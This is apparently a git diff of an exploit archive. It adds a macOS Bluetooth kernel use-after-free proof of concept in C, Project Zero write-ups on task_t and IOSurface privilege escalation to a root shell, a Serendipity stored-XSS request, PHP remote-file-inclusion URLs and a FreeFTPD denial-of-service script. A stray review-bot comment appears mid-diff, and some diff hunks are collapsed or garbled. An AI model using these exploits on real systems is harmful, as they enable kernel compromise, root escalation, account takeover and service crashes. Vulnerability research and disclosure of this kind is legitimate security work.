+this bug is clearly exploitable as just a plain memory corruption issue but can probably be leveraged for more interesting
+logic stuff too.
+
+Note that bluetooth does have to be turned on for this PoC to work!
+
+build: clang -o bluetooth_uaf bluetooth_uaf.c -framework IOKit
+
+You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
+
+tested on OS X 10.11.5 (15F34) on MacBookAir5,2
+*/
+
+#include
+#include
+#include
+#include
+
+#include
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+
+
+#define MACH_ERR(str, err) do { \
+ if (err != KERN_SUCCESS) { \
+ mach_error("[-]" str "\n", err); \
+ exit(EXIT_FAILURE); \
+ } \
+} while(0)
+
+#define FAIL(str) do { \
+ printf("[-] " str "\n"); \
+ exit(EXIT_FAILURE); \
+} while (0)
+
+#define LOG(str) do { \
+ printf("[+] " str"\n"); \
+} while (0)
+
+/***************
+ * port dancer *
+ ***************/
+
+// set up a shared mach port pair from a child process back to its parent without using launchd
+// based on the idea outlined by Robert Sesek here: https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html
+
+// mach message for sending a port right
+typedef struct {
+ mach_msg_header_t header;
+ mach_msg_body_t body;
+ mach_msg_port_descriptor_t port;
+} port_msg_send_t;
+
+// mach message for receiving a port right
+typedef struct {
+ mach_msg_header_t header;
+ mach_msg_body_t body;
+ mach_msg_port_descriptor_t port;
+ mach_msg_trailer_t trailer;
+} port_msg_rcv_t;
+
+typedef struct {
+ mach_msg_header_t header;
+} simple_msg_send_t;
+
+typedef struct {
+ mach_msg_header_t header;
+ mach_msg_trailer_t trailer;
+} simple_msg_rcv_t;
+
+#define STOLEN_SPECIAL_PORT TASK_BOOTSTRAP_PORT
+
+// a copy in the parent of the stolen special port such that it can be restored
+mach_port_t saved_special_port = MACH_PORT_NULL;
+
+// the shared port right in the parent
+mach_port_t shared_port_parent = MACH_PORT_NULL;
+
+void setup_shared_port() {
+ kern_return_t err;
+ // get a send right to the port we're going to overwrite so that we can both
+ // restore it for ourselves and send it to our child
+ err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &saved_special_port);
+ MACH_ERR("saving original special port value", err);
+
+ // allocate the shared port we want our child to have a send right to
+ err = mach_port_allocate(mach_task_self(),
+ MACH_PORT_RIGHT_RECEIVE,
+ &shared_port_parent);
+
+ MACH_ERR("allocating shared port", err);
+
+ // insert the send right
+ err = mach_port_insert_right(mach_task_self(),
+ shared_port_parent,
+ shared_port_parent,
+ MACH_MSG_TYPE_MAKE_SEND);
+ MACH_ERR("inserting MAKE_SEND into shared port", err);
+
+ // stash the port in the STOLEN_SPECIAL_PORT slot such that the send right survives the fork
+ err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, shared_port_parent);
+ MACH_ERR("setting special port", err);
+}
+
+mach_port_t recover_shared_port_child() {
+ kern_return_t err;
+
+ // grab the shared port which our parent stashed somewhere in the special ports
+ mach_port_t shared_port_child = MACH_PORT_NULL;
+ err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &shared_port_child);
+ MACH_ERR("child getting stashed port", err);
+
+ LOG("child got stashed port");
+
+ // say hello to our parent and send a reply port so it can send us back the special port to restore
+
+ // allocate a reply port
+ mach_port_t reply_port;
+ err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
+ MACH_ERR("child allocating reply port", err);
+
+ // send the reply port in a hello message
+ simple_msg_send_t msg = {0};
+
+ msg.header.msgh_size = sizeof(msg);
+ msg.header.msgh_local_port = reply_port;
+ msg.header.msgh_remote_port = shared_port_child;
+ msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+
+ err = mach_msg_send(&msg.header);
+ MACH_ERR("child sending task port message", err);
+
+ LOG("child sent hello message to parent over shared port");
+
+ // wait for a message on the reply port containing the stolen port to restore
+ port_msg_rcv_t stolen_port_msg = {0};
+ err = mach_msg(&stolen_port_msg.header, MACH_RCV_MSG, 0, sizeof(stolen_port_msg), reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ MACH_ERR("child receiving stolen port\n", err);
+
+ // extract the port right from the message
+ mach_port_t stolen_port_to_restore = stolen_port_msg.port.name;
+ if (stolen_port_to_restore == MACH_PORT_NULL) {
+ FAIL("child received invalid stolen port to restore");
+ }
+
+ // restore the special port for the child
+ err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, stolen_port_to_restore);
+ MACH_ERR("child restoring special port", err);
+
+ LOG("child restored stolen port");
+ return shared_port_child;
+}
+
+mach_port_t recover_shared_port_parent() {
+ kern_return_t err;
+
+ // restore the special port for ourselves
+ err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port);
+ MACH_ERR("parent restoring special port", err);
+
+ // wait for a message from the child on the shared port
+ simple_msg_rcv_t msg = {0};
+ err = mach_msg(&msg.header,
+ MACH_RCV_MSG,
+ 0,
+ sizeof(msg),
+ shared_port_parent,
+ MACH_MSG_TIMEOUT_NONE,
+ MACH_PORT_NULL);
+ MACH_ERR("parent receiving child hello message", err);
+
+ LOG("parent received hello message from child");
+
+ // send the special port to our child over the hello message's reply port
+ port_msg_send_t special_port_msg = {0};
+
+ special_port_msg.header.msgh_size = sizeof(special_port_msg);
+ special_port_msg.header.msgh_local_port = MACH_PORT_NULL;
+ special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port;
+ special_port_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX;
+ special_port_msg.body.msgh_descriptor_count = 1;
+
+ special_port_msg.port.name = saved_special_port;
+ special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
+ special_port_msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
+
+ err = mach_msg_send(&special_port_msg.header);
+ MACH_ERR("parent sending special port back to child", err);
+
+ return shared_port_parent;
+}
+
+/*** end of port dancer code ***/
+
+void do_child(mach_port_t shared_port) {
+ kern_return_t err;
+
+ // create a reply port to receive an ack that we should exec the target
+ mach_port_t reply_port;
+ err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port);
+ MACH_ERR("child allocating reply port", err);
+
+ // send our task port to our parent over the shared port
+ port_msg_send_t msg = {0};
+
+ msg.header.msgh_size = sizeof(msg);
+ msg.header.msgh_local_port = reply_port;
+ msg.header.msgh_remote_port = shared_port;
+ msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) | MACH_MSGH_BITS_COMPLEX;
+
+ msg.body.msgh_descriptor_count = 1;
+
+ msg.port.name = mach_task_self();
+ msg.port.disposition = MACH_MSG_TYPE_COPY_SEND;
+ msg.port.type = MACH_MSG_PORT_DESCRIPTOR;
+
+ err = mach_msg_send(&msg.header);
+ MACH_ERR("child sending task port message", err);
+
+ LOG("child sent task port back to parent");
+
+ // spin and let our parent kill us
+ while(1){;}
+}
+
+mach_port_t do_parent(mach_port_t shared_port) {
+ kern_return_t err;
+
+ // wait for our child to send us its task port
+ port_msg_rcv_t msg = {0};
+ err = mach_msg(&msg.header,
+ MACH_RCV_MSG,
+ 0,
+ sizeof(msg),
+ shared_port,
+ MACH_MSG_TIMEOUT_NONE,
+ MACH_PORT_NULL);
+ MACH_ERR("parent receiving child task port message", err);
+
+ mach_port_t child_task_port = msg.port.name;
+ if (child_task_port == MACH_PORT_NULL) {
+ FAIL("invalid child task port");
+ }
+
+ LOG("parent received child's task port");
+
+ return child_task_port;
+}
+
+io_connect_t get_connection(mach_port_t task_port) {
+ kern_return_t err;
+ mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
+
+ if (service == MACH_PORT_NULL) {
+ printf("unable to get service\n");
+ return MACH_PORT_NULL;
+ }
+
+ io_connect_t conn = MACH_PORT_NULL;
+
+ err = IOServiceOpen(service, task_port, 0, &conn); // 1 = IOBluetoothHCIUserClient
+ if (err != KERN_SUCCESS){
+ printf("IOServiceOpen failed: %s\n", mach_error_string(err));
+ conn = MACH_PORT_NULL;
+ }
+ IOObjectRelease(service);
+
+ return conn;
+}
+
+void trigger(int child_pid, mach_port_t child_task_port) {
+ kern_return_t err;
+ // get the userclient passing the child's task port
+ io_connect_t conn = get_connection(child_task_port);
+ if (conn == MACH_PORT_NULL){
+ printf("unable to get connection\n");
+ return;
+ }
+
+ printf("got user client\n");
+
+ // drop our ref on the child_task_port
+ mach_port_deallocate(mach_task_self(), child_task_port);
+
+ // kill the child, free'ing its task struct
+ kill(child_pid, 9);
+ int status;
+ wait(&status);
+
+ printf("killed child\n");
+
+ // make an external method call which will use that free'd task struct
+ char struct_input[0x74] = {0};
+
+ //+0x70 dword = index into sroutines
+ //+0x38 dword = size of first argument
+ //+0x0 qword = pointer to first argument
+ struct_input[0x38] = 0x80;
+ *(uint64_t*)(&struct_input[0]) = 0x414141414141;
+
+ err = IOConnectCallMethod(conn,
+ 0,
+ NULL,
+ 0,
+ struct_input,
+ 0x74,
+ NULL,
+ NULL,
+ NULL,
+ NULL);
+ MACH_ERR("making external method call", err);
+
+}
+
+int main(int argc, char** argv) {
+ setup_shared_port();
+
+ pid_t child_pid = fork();
+ if (child_pid == -1) {
+ FAIL("forking");
+ }
+
+ if (child_pid == 0) {
+ mach_port_t shared_port_child = recover_shared_port_child();
+ do_child(shared_port_child);
+ } else {
+ mach_port_t shared_port_parent = recover_shared_port_parent();
+ mach_port_t child_task_port = do_parent(shared_port_parent);
+ trigger(child_pid, child_task_port);
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/platforms/osx/local/40653.txt b/platforms/osx/local/40653.txt
new file mode 100755
index 000000000..40b8e0520
--- /dev/null
+++ b/platforms/osx/local/40653.txt
@@ -0,0 +1,31 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=831
+
+IOSurfaceRootUserClient stores a task struct pointer (passed in via IOServiceOpen) in the field at +0xf0 without taking a reference.
+
+By killing the corrisponding task we can free this pointer leaving the user client with a dangling pointer. We can get this pointer used
+by calling the create_surface_fast_path external method which will try to read and use the memory map off of the free'd task struct.
+
+This bug could be leveraged for kernel memory corruption and is reachable from interesting sandboxes including safari and chrome.
+
+build: clang -o surfaceroot_uaf surfaceroot_uaf.c -framework IOKit
+
+You should set gzalloc_min=1024 gzalloc_max=2048 or similar to actually fault on the UaF - otherwise you might see some weird panics!
+
+tested on OS X 10.11.5 (15F34) on MacBookAir5,2
+
+#####################################
+
+another PoC for "task_t considered harmful"
+since 10.11.6 blocks us from creating userclients with other task's task ports
+this time we create an IOSurface in the child and send back a send right to that
+IOSurface to the parent (rather than sending the child's task port.)
+
+The child then execs a suid-root binary which blocks on stderr and the parent
+creates an IOSurface which maps any (writable?) page of the euid-0 process into theirs.
+Overwrite a function pointer and win.
+
+No race conditions because the task struct pointer is on the kernel heap, not the stack.
+
+
+Proofs of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40653.zip
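Review bot: In platforms/osx/dos/40652.c the trailing comment on the IOServiceOpen call in get_connection() says `// 1 = IOBluetoothHCIUserClient`, but the call passes type 0 and the header comment also describes IOBluetoothHCIUserClient as user client type 0. The comment should match the code, e.g. `// type 0 = IOBluetoothHCIUserClient`, so that anyone triaging the report or writing a detection for it is not misled about which user client is involved. The advisory text is also present twice at the top of the file, once under the Source line and again after `// ianbeer`; keeping a single copy would stop the two from drifting apart.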
diff --git a/platforms/osx/local/40669.txt b/platforms/osx/local/40669.txt
new file mode 100755
index 000000000..8d4d6fac8
--- /dev/null
+++ b/platforms/osx/local/40669.txt
@@ -0,0 +1,249 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=837
+
+TL;DR
+you cannot hold or use a task struct pointer and expect the euid of that task to stay the same.
+Many many places in the kernel do this and there are a great many very exploitable bugs as a result.
+
+********
+
+task_t is just a typedef for a task struct *. It's the abstraction level which represents a whole task
+comprised of threads and a virtual memory map.
+
+task_t's have a corrisponding mach port type (IKOT_TASK) known as a task port. The task port structure
+in the kernel has a pointer to the task struct which it represents. If you have send rights to a task port then
+you have control over its VM and, via task_threads, its threads.
+
+When a suid-root binary is executed the kernel invalidates the old task and thread port structures setting their
+object pointers to NULL and allocating new ports instead.
+
+CVE-2016-1757 was a race condition concerning the order in which those port structures were invalidated during the
+exec operation.
+
+Although the issues I will describe in this bug report may seem similar is is a completely different, and far worse,
+bug class.
+
+~~~~~~~~~
+
+When a suid binary is executed it's true that the task's old task and thread ports get invalidated, however, the task
+struct itself stays the same. There's no fork and no creation of a new task. This means that any pointers to that task struct
+now point to the task struct of an euid 0 process.
+
+There are lots of IOKit drivers which save task struct pointers as members; see my recent bug reports for some examples.
+
+In those cases I reported there was another bug, namely that they weren't taking a reference on the task struct meaning
+that if we killed the corrisponding task and then forked and exec'ed a suid root binary we could get the IOKit object
+to interact via the task struct pointer with the VM of a euid 0 process.
(You could also break out of a sandbox by
+forcing launchd to spawn a new service binary which would reuse the free'd task struct.)
+
+However, looking more closely, even if those IOKit drivers *do* take a reference on the task struct it doesn't matter!
+(at least not when there are suid binaries around.) Just because the userspace client of the user client had send rights
+to a task port at time A when it passed that task port to IOKit doesn't mean that it still has send rights to it when
+the IOKit driver actually uses the task struct pointer... In the case of IOSurface this lets us trivially map any RW area
+of virtual memory in an euid 0 process into ours and write to it. (See the other exploit I sent for that IOSurface bug.)
+
+There are a large number of IOKit drivers which do this (storing task struct pointers) and then either use the to manipulate
+userspace VM (eg IOAcceleratorFamily2, IOThunderboltFamily, IOSurface) or rely on that task struct pointer to perform
+authorization checks like the code in IOHIDFamily.
+
+Another interesting case to consider are task struct pointers on the stack.
+
+in the MIG files for the user/kernel interface task ports are subject to the following intran:
+
+ type task_t = mach_port_t
+ #if KERNEL_SERVER
+ intran: task_t convert_port_to_task(mach_port_t)
+
+where convert_port_to_task is:
+
+ task_t
+ convert_port_to_task(
+ ipc_port_t port)
+ {
+ task_t task = TASK_NULL;
+
+ if (IP_VALID(port)) {
+ ip_lock(port);
+
+ if ( ip_active(port) &&
+ ip_kotype(port) == IKOT_TASK ) {
+ task = (task_t)port->ip_kobject;
+ assert(task != TASK_NULL);
+
+ task_reference_internal(task);
+ }
+
+ ip_unlock(port);
+ }
+
+ return (task);
+ }
+
+This converts the task port into the corrisponding task struct pointer. It takes a reference on the task struct but that only
+makes sure that it doesn't get free'd, not that its euid doesn't change as the result of the exec of an suid root binary.
+
+As soon as that port lock is dropped the task could exec a suid-root binary and although this task port would no longer be valid
+that task struct pointer would remain valid.
+
+This leads to a huge number of interesting race conditions. Grep the source for all .defs files which take a task_t to find them all ;-)
+
+In this exploit PoC I'll target perhaps the most interesting one: task_threads.
+
+Let's look at how task_threads actually works, including the kernel code which is generated by MiG:
+
+In task_server.c (an autogenerated file, build XNU first if you can't find this file) :
+
+ target_task = convert_port_to_task(In0P->Head.msgh_request_port);
+
+ RetCode = task_threads(target_task, (thread_act_array_t *)&(OutP->act_list.address), &OutP->act_listCnt);
+ task_deallocate(target_task);
+
+This gives us back the task struct from the task port then calls task_threads:
+(unimportant bits removed)
+
+ task_threads(
+ task_t task,
+ thread_act_array_t *threads_out,
+ mach_msg_type_number_t *count)
+ {
+ ...
+ for (thread = (thread_t)queue_first(&task->threads); i < actual;
+ ++i, thread = (thread_t)queue_next(&thread->task_threads)) {
+ thread_reference_internal(thread);
+ thread_list[j++] = thread;
+ }
+
+ ...
+
+ for (i = 0; i < actual; ++i)
+ ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]);
+ }
+ ...
+ }
+
+task_threads uses the task struct pointer to iterate through the list of threads, then creates send rights to them
+which get sent back to user space. There are a few locks taken and dropped in here but they're irrelevant.
+
+What happens if that task is exec-ing a suid root binary at the same time?
+
+The relevant parts of the exec code are these two points in ipc_task_reset and ipc_thread_reset:
+
+ void
+ ipc_task_reset(
+ task_t task)
+ {
+ ipc_port_t old_kport, new_kport;
+ ipc_port_t old_sself;
+ ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
+ int i;
+
+ new_kport = ipc_port_alloc_kernel();
+ if (new_kport == IP_NULL)
+ panic("ipc_task_reset");
+
+ itk_lock(task);
+
+ old_kport = task->itk_self;
+
+ if (old_kport == IP_NULL) {
+ itk_unlock(task);
+ ipc_port_dealloc_kernel(new_kport);
+ return;
+ }
+
+ task->itk_self = new_kport;
+ old_sself = task->itk_sself;
+ task->itk_sself = ipc_port_make_send(new_kport);
+ ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); <-- point (1)
+
+ ... then calls:
+
+ ipc_thread_reset(
+ thread_t thread)
+ {
+ ipc_port_t old_kport, new_kport;
+ ipc_port_t old_sself;
+ ipc_port_t old_exc_actions[EXC_TYPES_COUNT];
+ boolean_t has_old_exc_actions = FALSE;
+ int i;
+
+ new_kport = ipc_port_alloc_kernel();
+ if (new_kport == IP_NULL)
+ panic("ipc_task_reset");
+
+ thread_mtx_lock(thread);
+
+ old_kport = thread->ith_self;
+
+ if (old_kport == IP_NULL) {
+ thread_mtx_unlock(thread);
+ ipc_port_dealloc_kernel(new_kport);
+ return;
+ }
+
+ thread->ith_self = new_kport; <-- point (2)
+
+Point (1) clears out the task struct pointer from the old task port and allocates a new port for the task.
+Point (2) does the same for the thread port.
+
+Let's call the process which is doing the exec process B and the process doing task_threads() process A and imagine
+the following interleaving of execution:
+
+ Process A: target_task = convert_port_to_task(In0P->Head.msgh_request_port); // gets pointer to process B's task struct
+
+ Process B: ipc_kobject_set(old_kport, IKO_NULL, IKOT_NONE); // process B invalidates the old task port so that it no longer has a task struct pointer
+
+ Process B: thread->ith_self = new_kport // process B allocates new thread ports and sets them up
+
+ Process A: ((ipc_port_t *) thread_list)[i] = convert_thread_to_port(thread_list[i]); // process A reads and converts the *new* thread port objects!
+
+Note that the fundamental issue here isn't this particular race condition but the fact that a task struct pointer can just
+never ever be relied on to have the same euid as when you first got hold of it.
+
+~~~~~~~~~~~~~~~
+
+Exploit:
+
+This PoC exploits exactly this race condition to get a thread port for an euid 0 process. Since we've execd it I just stick a
+ret-slide followed by a small ROP payload on the actual stack at exec time then use the thread port to set RIP to a gadget
+which does a large add rsp, X and pop's a shell :)
+
+just run it for a while, it's quite a tight race window but it will work! (try a few in parallel)
+
+tested on OS X 10.11.5 (15F34) on MacBookAir5,2
+
+######################################
+
+A faster exploit which also defeats the mitigations shipped in MacOS 10.12. Should work for all kernel versions <= 10.12
+
+######################################
+
+Fixed: https://support.apple.com/en-us/HT207275
+
+Disclosure timeline:
+
+2016-06-02 - Ian Beer reports "task_t considered harmful issue" to Apple
+2016-06-30 - Apple requests 60 day disclosure extension.
+2016-07-12 - Project Zero declines disclosure extension request.
+2016-07-19 - Meeting with Apple to discuss disclosure timeline.
+2016-07-21 - Followup meeting with Apple to discuss disclosure timeline.
+2016-08-10 - Meeting with Apple to discuss proposed fix and disclosure timeline.
+2016-08-15 - Project Zero confirms publication date will be September 21, Apple acknowledges.
+2016-08-29 - Meeting with Apple to discuss technical details of (1) "short-term mitigation" that will be shipped within disclosure deadline, and (2) "long-term fix" that will be shipped after the disclosure deadline.
+2016-09-13 - Apple release the "short-term mitigation" for iOS 10
+2016-09-13 - Apple requests a restriction on disclosed technical details to only those parts of the issue covered by the short-term mitigation.
+2016-09-14 - Project Zero confirms that it will disclose full details without restriction.
+2016-09-16 - Apple repeats request to withhold details from the disclosure, Project Zero confirms it will disclose full details.
+2016-09-17 - Apple requests that Project Zero delay disclosure until a security update in October.
+2016-09-18 - Apple's senior leadership contacts Google's senior leadership to request that Project Zero delay disclosure of the task_t issue
+2016-09-19 - Google grants a 5 week flexible disclosure extension.
+2016-09-20 - Apple release a "short-term mitigation" for the task_t issue for MacOS 10.12
+2016-09-21 - Planned publication date passes.
+2016-10-03 - Apple publicly release long-term fix for the task_t issue in MacOS beta release version 10.12.1 beta 3.
+2016-10-24 - Apple release MacOS version 10.12.1
+2016-10-25 - Disclosure date of "task_t considered harmful"
+
+Project Zero remains committed to a 90-day disclosure window, and will continue to apply disclosure deadlines on all of our vulnerability research findings. A 14 day grace extension is available for cases where a patch is expected shortly after the 90-day time window.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40669.zip
diff --git a/platforms/php/webapps/28403.txt b/platforms/php/webapps/28403.txt index 55a0b79f1..4fb1aa38f 100755 --- a/platforms/php/webapps/28403.txt +++ b/platforms/php/webapps/28403.txt @@ -8,4 +8,5 @@ Versions 1.2 and prior are vulnerable to these issues; other versions may also b This BID has been retired because this issue is not exploitable. -http://www.example.com/mtg_homepage.php?mosConfig_absolute_path=http://www.example.com http://www.example.com/install.mtg_homepage.php?mosConfig_absolute_path=http://www.example.com \ No newline at end of file +http://www.example.com/mtg_homepage.php?mosConfig_absolute_path=http://www.example.com +http://www.example.com/install.mtg_homepage.php?mosConfig_absolute_path=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/28404.txt b/platforms/php/webapps/28404.txt index 3b19971ce..56e04aa67 100755 --- a/platforms/php/webapps/28404.txt +++ b/platforms/php/webapps/28404.txt @@ -8,4 +8,6 @@ Versions 1.0 and prior are vulnerable to these issues; other versions may also b This BID has been retired. -http://www.example.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt? http://www.example.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt? http://www.example.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt? \ No newline at end of file +http://www.example.com/joomla_path/components/com_rssxt/pinger.php?mosConfig_absolute_path=Shell.txt? +http://www.example.com/joomla_path/components/com_rssxt/RPC.php?mosConfig_absolute_path=Shell.txt? +http://www.example.com/joomla_path/components/com_rssxt/rssxt.php?mosConfig_absolute_path=Shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/40650.txt b/platforms/php/webapps/40650.txt new file mode 100755 index 000000000..f4855170f --- /dev/null +++ b/platforms/php/webapps/40650.txt 
@@ -0,0 +1,72 @@
+========================================
+Title: Serendipity-2.0.4 (latest version) - Stored Cross Site Scripting
+Application: Serendipity
+Class: Sensitive Information disclosure
+Versions Affected: <= latest version
+Vendor URL: http://docs.s9y.org/
+Software URL: http://docs.s9y.org/downloads.html
+Bugs: Persistent Cross Site Scripting
+Date of found: 29.10.2016
+Author: Besim
+========================================
+
+2.CREDIT
+========================================
+Those vulnerabilities was identified by Meryem AKDOĞAN and Besim ALTINOK
+
+
+3. VERSIONS AFFECTED
+========================================
+ <= latest version
+
+
+4. TECHNICAL DETAILS & POC
+========================================
+
+ Stored Cross Site Scripting (No Admin Required)
+========================================
+
+1) Editor login panel
+2) User click 'New Entry'
+3) Attacker(normal user) enter xss payload to 'Entry Body' input
+4) Vulnerability Parameter and Payload : &body=
+
+### HTTP Request ###
+
+POST /serendipity/serendipity_admin.php?
HTTP/1.1
+Host: site_name
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://site_name/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=new
+Cookie: ---
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 762
+
+- POST DATA
+
+serendipity[action]=admin
+&serendipity[adminModule]=entries
+&serendipity[adminAction]=save
+&serendipity[id]=
+&serendipity[timestamp]=1477314176
+&serendipity[preview]=false
+&serendipity[token]=324fa32a404e03de978d9a18f86a3338
+&serendipity[title]=New Page
+&serendipity[body]=
+&serendipity[extended]=
+&serendipity[chk_timestamp]=1477314176
+&serendipity[new_timestamp]=2016-10-24 15:02
+&serendipity[isdraft]=false
+&serendipity[allow_comments]=true
+&serendipity[had_categories]=1
+&serendipity[propertyform]=true
+&serendipity[properties][access]=public
+&ignore_password=
+&serendipity[properties][entrypassword]=
+&serendipity[change_author]=4
+
+
diff --git a/platforms/windows/dos/40647.py b/platforms/windows/dos/40647.py
new file mode 100755
index 000000000..807246e67
--- /dev/null
+++ b/platforms/windows/dos/40647.py
@@ -0,0 +1,99 @@ +from ftplib import FTP + +print ''' + + + `,;'++';,` + `'++++++++++++++++;` + .+++++++++++++++++++++++'` + ;++++++:` `:++++++: + '++++'` , +`. :; .`` .'++++; + :++++, '+ `+.+.+`+':+:+ +:` + :++++, + ++++, `+ +`+.+`+':+.+ +:'.+. :++++ + ,+++; +` +:':+`+',+`+,++.+:+ +, '+++. + '+++` `++ ;+ ,+:'; ,: ;;+`++ +.+`+. `+++; + +++; `: ++' + '+++ :++;++,+: + '+++ + +++, ++' ,+ .;+++++',` : + ',+ :+++ + +++` ++ +:+ +: .+++++++++++++++; : ++'+,,`,+++ + +++` `+;.+'` '++++++++++++++++++++. ;+;+:.+` .+++ + '++` ++ +,.` '++++++++++++++++++++++++. +;.+`+ ,++; + :++, +:++`' ,+++++++++++++''++++++++++++ `+.+: :++. + ++; . +:+: +++++++++'. `;++++++++. .+' ++ +++ + +++ ;++ +: ++++++++, .+++++++; ;:+;+ +++ + :++ ;+,++ `+++++++, `++++++' +,+,.+ `++. + ++: `+`+'. ++++++' ;+++++' +`;++ '++ + '++ ,+,' ++++++, .+++++; ++ ++: + ++. ' + ++++++` +++++. ` '+.:++ + ;++ +; + ;+++++` +++++ :++ ; ++: + ++, '++ `+++++, `+++++ +` `. :++ + ,++ ` ;+: +++++' :++++` ,+ ++` + ++; .+++` .+++++ +++++ '++:: ++' + ++` ;+':: +++++. ++++` '`+++`.++ + .++ `++ +++++ '++++ +: ++` + '++ `++; '++++` ++++ ++; + ++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++: + ++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + ++ +;,` ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++: +;++ `.,. +++++ ++++ '..': ,++'` ,+++` `++++ ++++ +;+` ++++: ++++++' ++++++' ++++ ++++ :.'`; ++++: ++` :+, ++` ,+: ++++ +'++ `+++. ++++; : + : + ,++++ +;++ :` ++++' `+++++ +,++ `+;;+ +++++ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; :;;;;;;;;;;;;;;++++++. 
+`++ ++,+ +++++ :+++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++' + ++ ` `, ;++++ ++++++++++++++++++++++++++++++++++++: ++++++++++++++++++++ + ++` .+++.`++++: ++++++++++++++++++++++++++++++++++++ `++++++++++++++++++, + ++: ','+: +++++ :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++ ++++:,:,,:,,+++,. + ;++ +:`, '++++` +++++. +++++` ++++ '.+' ++, + ++ +++ +++++ :+++++ ++++++ ;++++ ++.+ ++ + ++, ';`+' +++++` ++++++ ++++++ ++++` + +. :++ + '++ :++;, .+++++ ++++++` ++++++, +++++ ++: + `++ +` :+, +++++: .++++++' :++++++; .++++. +` `++ + ++' ;++` `+++++` ,+++++++'` :+++++++; +++++ :++` +++ + ,++ ,: + '+++++ .++++++++++';:;++++++++++: +++++ ;+' ++` + +++ :+' ++++++ ++++++++++++++++++++++` +++++. ;+` , +++ + ,++ :++`;+` ++++++` :++++++++++++++++++' +++++' `+,+;`;`++. + +++ : ++.+ `++++++: :++++++++++++++; ,+++++' ++`+ +++ + `++, +;+` `+++++++` `:++++++++:` ++++++' ++ ,+; ;++` + '++ :+ `' ++++++++` `+++++++; +++ ;`++; + +++ `:`+ +++++++++: ,++++++++, +,++ +++ + +++ +++;' :+++++++++++';::;'+++++++++++ ;+ +,' +++ + ,+++ +++.+.: +++++++++++++++++++++++++. '' ++ + +++` + ;++' ` +`+`;. `+++++++++++++++++++++, :,+,:+: +++, + ;+++ ,++:'++` ,+++++++++++++++; ++ .++ ` +++: + ;+++ + +`+ +; .;'++++':` ++.+':++ +++: + :+++` `++, :;+`+; ::+ +,+`+. .+++, + .+++' `, +`:'+ +,+` +, +:+.++:';+ ++ ++++` + ++++. +':++: +;+` ': +:+ +.+ +' :++++ + :++++. . +,+,;+'` '; :'+`+'+ ,++++, + +++++: ` +`+'` '; `++` ;++++' + `++++++: ;' + :++++++` + `+++++++':. `,:+++++++' + .++++++++++++++++++++++. 
+ `:'++++++++++++', + + ############################################## + # Created: ScrR1pTK1dd13 # + # Name: Greg Priest # + # Mail: ScrR1pTK1dd13.slammer@gmail.com # + ############################################## + + +# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit +# Date: 2016.10.30 +# Exploit Author: Greg Priest +# Version: FreeFTPD_1.0.8 +# Tested on: Windows XP, Windows 7 x64 + +''' + +ftp_ip = raw_input("FTP server IP:") +killerstring = 'A' * 500 +ftp = FTP('127.0.0.1') +ftp.login('anonymous', 'h4ck3r@h4ck3r.net') +print ftp.login +print "SERVER KILLED" +FTP.mkd(ftp, killerstring) diff --git a/platforms/windows/dos/40648.txt b/platforms/windows/dos/40648.txt new file mode 100755 index 000000000..323e80cd8 --- /dev/null +++ b/platforms/windows/dos/40648.txt 
